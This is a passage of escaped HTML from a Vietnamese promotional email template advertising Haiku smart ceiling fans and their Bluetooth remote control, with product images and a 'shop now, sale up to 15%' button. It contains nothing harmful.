b\\u1eb1ng s\\u00e1ng ch\\u1ebf, gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i t\\u1eeb m\\u1ecdi g\\u00f3c \\u0111\\u1ed9 s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502936864-sen_1.png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503569736-bamboo-caramel.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\" style=\\\"height:47px; v-text-anchor:middle; width:283px;\\\" arcsize=\\\"85%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e03e2d\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e03e2d; border-radius: 40px;-webkit-border-radius: 40px; -moz-border-radius: 40px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 44px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM SHOP - SALE UP TO 15%<\\/span><\\/strong><\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #d8d0d0;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 20px; font-weight: 400;\\\">\\u0110I\\u1ec0U KHI\\u1ec2N TI\\u1ec6N \\u00cdCH - TH\\u00d4NG MINH<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Ki\\u1ec3m so\\u00e1t t\\u1ed1t h\\u01a1n c\\u00e1c t\\u00ednh n\\u0103ng n\\u00e2ng cao c\\u1ee7a Haiku v\\u1edbi \\u0111i\\u1ec1u khi\\u1ec3n t\\u1eeb xa bluetooth cao c\\u1ea5p. \\u0110i\\u1ec1u ch\\u1ec9nh t\\u1ed1c \\u0111\\u1ed9 qu\\u1ea1t c\\u1ee7a b\\u1ea1n, thay \\u0111\\u1ed5i t\\u00f9y ch\\u1ecdn \\u00e1nh s\\u00e1ng ho\\u1eb7c s\\u1eed d\\u1ee5ng t\\u1ea5t c\\u1ea3 c\\u00e1c ch\\u1ebf \\u0111\\u1ed9 H\\u1eb9n gi\\u1edd, Xo\\u00e1y v\\u00e0 Ng\\u1ee7 m\\u00e0 kh\\u00f4ng c\\u1ea7n r\\u1eddi kh\\u1ecfi ch\\u1ed7 ng\\u1ed3i c\\u1ee7a b\\u1ea1n. N\\u1ebfu b\\u1ea1n lu\\u00f4n lu\\u00f4n m\\u1ea5t \\u0111\\u1ed3? \\u0110i\\u1ec1u khi\\u1ec3n t\\u1eeb xa \\u0111i k\\u00e8m v\\u1edbi m\\u1ed9t gi\\u00e1 treo t\\u01b0\\u1eddng \\u0111\\u01a1n gi\\u1ea3n \\u0111\\u1ec3 \\u0111\\u1eb7t thu\\u1eadn ti\\u1ec7n v\\u00e0 an to\\u00e0n.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677504582593-dieu-khien-haiku.png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503408657-intergatehaiku.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503423701-remote_control.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 180px;\\\" width=\\\"180\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #95a5a6;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503713719-home_haiku.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 33px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: \'Source Sans Pro\',sans-serif; font-size: 28px; font-weight: 700; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_social_1\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 4px 4px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:254px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"254\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:254px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 19px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 19px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td 